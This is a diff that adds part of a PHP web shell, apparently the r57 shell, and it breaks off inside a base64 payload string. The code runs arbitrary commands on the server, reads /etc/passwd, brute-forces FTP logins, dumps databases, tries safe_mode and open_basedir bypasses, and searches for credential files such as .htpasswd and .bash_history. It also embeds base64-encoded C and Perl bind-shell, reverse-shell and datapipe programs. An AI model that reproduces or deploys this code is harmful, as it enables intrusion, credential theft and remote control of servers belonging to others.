+'ru_err7'=>'Ïèñüìî îòïğàâëåíî',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+);
+/*
+Àëèàñû êîìàíä
+Ïîçâîëÿşò èçáåæàòü ìíîãîêğàòíîãî íàáîğà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàğÿ ìîåé ïğèğîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;	
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 	
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';	
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }	
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
